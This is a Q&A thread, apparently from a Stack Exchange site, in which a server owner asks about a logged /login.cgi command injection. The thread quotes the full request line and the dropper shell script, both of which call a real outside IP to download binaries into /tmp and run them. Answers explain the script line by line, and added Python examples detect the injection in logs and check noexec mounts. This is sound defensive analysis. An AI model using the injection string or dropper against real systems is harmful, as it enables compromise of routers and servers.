I've been noticing the following strange lines in my server's Apache logs lately:

156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"

So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.

But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?

Anyway, here it is:

#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
    do
    rm -rf $u
    cp $SHELL $u
    chmod 777 $u
    >$u
    wget http://$http_server:$http_port/$name -O -> $u
    ./$u $name
done
RonJohn
ndom91
  • Related vulnerability: https://twitter.com/txalin/status/1007625620090707974?lang=en – test Sep 08 '18 at 18:58
  • How did that script get on your server in the first place? – MrWhite Sep 09 '18 at 01:06
  • I just opened the .sh file in a browser on my home PC and copied and pasted it in here; it never actually got on my server. – ndom91 Sep 09 '18 at 06:26
  • This script is a 'dropper', which is used to download the actual exploit script. This will be located at `hxxp://80.211.173.159:80/$name` where `$name` is each of the CPU architectures in `bin_names`. So 7 attack scripts will be downloaded and executed. – BlueCacti Sep 10 '18 at 10:08
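
The asker mentions a custom Fail2Ban filter for these requests. As an added example (not code from the question or from any of the answerers), the following Python parses Apache combined-format log lines, URL-decodes the query string, flags a `/login.cgi` request whose `cli` parameter carries a shell command separator followed by a downloader or interpreter, and pulls out the dropper URL as an indicator to block. The regexes, function names and the two benign sample lines are my own constructions; the first sample line is the request quoted in the question.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the first line is the request quoted in the question;
# the other two are made-up benign requests used as negative controls.
SAMPLE_LOG = """\
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
192.0.2.11 - - [08/Sep/2018:04:28:01 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.12 - - [08/Sep/2018:04:29:10 +0200] "GET /login.cgi?cli=alice HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: host ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A shell command separator followed by a downloader or interpreter name. The
# query string is URL-decoded before matching, so %3B and a literal ';' both count.
SHELL_INJECTION_RE = re.compile(r"(?:;|\||&&|`|\$\()\s*(?:wget|curl|tftp|chmod|sh)\b", re.I)

# URLs embedded in the injected command are the dropper locations worth blocking.
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def classify(line):
    """Parse one log line; return None if it is not in Apache combined format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m["target"].partition("?")
    decoded = unquote(query)
    injected = path == "/login.cgi" and SHELL_INJECTION_RE.search(decoded) is not None
    return {
        "host": m["host"],
        "path": path,
        "injection": injected,
        "urls": URL_RE.findall(decoded) if injected else [],
    }


def scan(log_text):
    """Return the records for lines that carry a /login.cgi command injection."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["injection"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f"{rec['host']} injected a command via {rec['path']}; dropper URLs: {rec['urls']}")
```

Matching on the decoded query rather than on the raw request line keeps the rule from being bypassed by alternative encodings of `;`, and the extracted URL (here the dropper host from the question) is what you would feed to an egress block or a threat-intel feed. The `host` capture group corresponds to what Fail2Ban calls `<HOST>` in a `failregex`, so the same decision can drive banning once expressed in Fail2Ban's own syntax.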

2 Answers


Line by line:

#!/bin/sh

Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.

u="asgknskjdgn"

Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.

bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"

Enumerates several common CPU architectures.

http_server="80.211.173.159"
http_port=80

The server which has the exploit.

cd /tmp/||cd /var/

Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.

for name in $bin_names
    do

For each CPU architecture…

    rm -rf $u

Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.

    cp $SHELL $u

Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.

    chmod 777 $u

Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.

    >$u

Empties out the file. Pointless because of the next line.

    wget http://$http_server:$http_port/$name -O -> $u

Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u.

    ./$u $name

Runs the exploit script with the architecture as the first argument.

done

Ends the loop.

It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard-coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.

l0b0
  • There is an advantage to explicitly rm'ing the file. If the destination already exists and is being executed right now, the kernel will not allow you to open the file for writing (-ETXTBSY). However, renaming or deleting a running program is allowed. – u1686_grawity Sep 08 '18 at 09:32
  • What does the `->` in the `wget` command do? Why not just `wget ... -O $u`? – RonJohn Sep 08 '18 at 20:39
  • @RonJohn read it as `- >` – cat Sep 08 '18 at 22:08
  • @l0b0 No, it doesn't. I meant in my comment that people could figure it out for themselves if they were curious. Sorry for starting a mess... – Nonny Moose Sep 08 '18 at 22:09
  • @RonJohn It's actually two separate things: `-O -`, which causes wget to write to stdout, and `>`, which begins output redirection. As for why not, the attacker appears to be inexperienced, or maybe it's for obfuscation? – Nonny Moose Sep 08 '18 at 22:10
  • With `-O->filename`, the `filename` doesn't show in the output of *ps ax*. That can be an advantage to make debugging harder. – pts Sep 09 '18 at 19:43
  • The `cp` gives you an executable file. Possibly useful if the `chmod` fails? Edit: given that [apparently](https://twitter.com/txalin/status/1007625620090707974?lang=en) this targets routers, it's quite possible that `chmod` doesn't exist. – Bob Sep 10 '18 at 02:47
  • The script doesn't even try to identify the CPU arch of the target; it downloads and runs all of the scripts. I wonder if running the wrong script could brick the system (unless the script itself does the checking). – BlueCacti Sep 10 '18 at 10:07
  • This is indeed quite amateurish. The exploit it uses is even only for specific DLINK gear, so it will only ever have the one working architecture. Of course, ugly successful hacks are still successful hacks… – w00t Sep 12 '18 at 11:59
  • Using > won't change the previously set permissions on the file. It looks like cp and chmod are both attempts to make the file executable, then the wget with redirection replaces the contents without changing the ownership and permissions of the file. Using wget -O filename would overwrite the file and change the permissions. – Randy Orrison Sep 12 '18 at 16:39
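
The answer's `cd /tmp/||cd /var/` commentary notes that the dropper relies on a directory the web server can both write to and execute from. As an added example (not part of the answer or its comments), the following Python reads a mount table in `/proc/mounts` format and reports, for each directory the dropper falls back through, whether the mount it lives on carries `noexec` and `nosuid`. The sample mount table, the `DROP_DIRS` list and all function names are my own constructions; on a Linux host the `main()` reads the real `/proc/mounts` instead.

```python
import os

# Constructed sample in /proc/mounts format (device mountpoint fstype options dump pass):
# /tmp is mounted noexec, /var is not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /var ext4 rw,relatime 0 0
"""

# Directories the dropper falls back through (cd /tmp/ || cd /var/), plus /var/tmp.
DROP_DIRS = ("/tmp", "/var", "/var/tmp")


def parse_mounts(text):
    """Return a list of (mountpoint, set_of_options) from /proc/mounts-style text."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in paths as \040
        mountpoint = fields[1].replace("\\040", " ")
        mounts.append((mountpoint, set(fields[3].split(","))))
    return mounts


def mount_for(path, mounts):
    """Pick the mount whose mountpoint is the longest path-prefix of path."""
    best = None
    for mountpoint, opts in mounts:
        if path == mountpoint or path.startswith(mountpoint.rstrip("/") + "/"):
            if best is None or len(mountpoint) > len(best[0]):
                best = (mountpoint, opts)
    return best


def drop_dir_exposure(mounts_text, dirs=DROP_DIRS):
    """For each candidate drop directory, report whether its mount has noexec/nosuid."""
    mounts = parse_mounts(mounts_text)
    report = {}
    for d in dirs:
        found = mount_for(d, mounts)
        mountpoint, opts = found if found else (None, set())
        report[d] = {
            "mountpoint": mountpoint,
            "noexec": "noexec" in opts,
            "nosuid": "nosuid" in opts,
        }
    return report


def main():
    # On a live Linux host read the real table; otherwise fall back to the sample.
    text = open("/proc/mounts").read() if os.path.exists("/proc/mounts") else SAMPLE_MOUNTS
    for d, info in drop_dir_exposure(text).items():
        flag = "ok" if info["noexec"] else "direct execution possible"
        print(f"{d:10s} mount={info['mountpoint']} noexec={info['noexec']} -> {flag}")


if __name__ == "__main__":
    main()
```

One caveat worth keeping in mind when reading the report: `noexec` only stops the `./$u $name` step, where the kernel would have to execute a file on that mount. The original request line ends in `sh /tmp/ks`, where the interpreter merely reads the file, and `noexec` does nothing against that. The mount option therefore complements, rather than replaces, a confined web server user (the SELinux point in the answer) and blocking the requests in the logs.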

The wget is the key dangerous line.

The for name in $bin_names is working through the list of platforms and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.

It then downloads a file using wget and then executes it using the shell program it just copied over.

The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.

Mokubai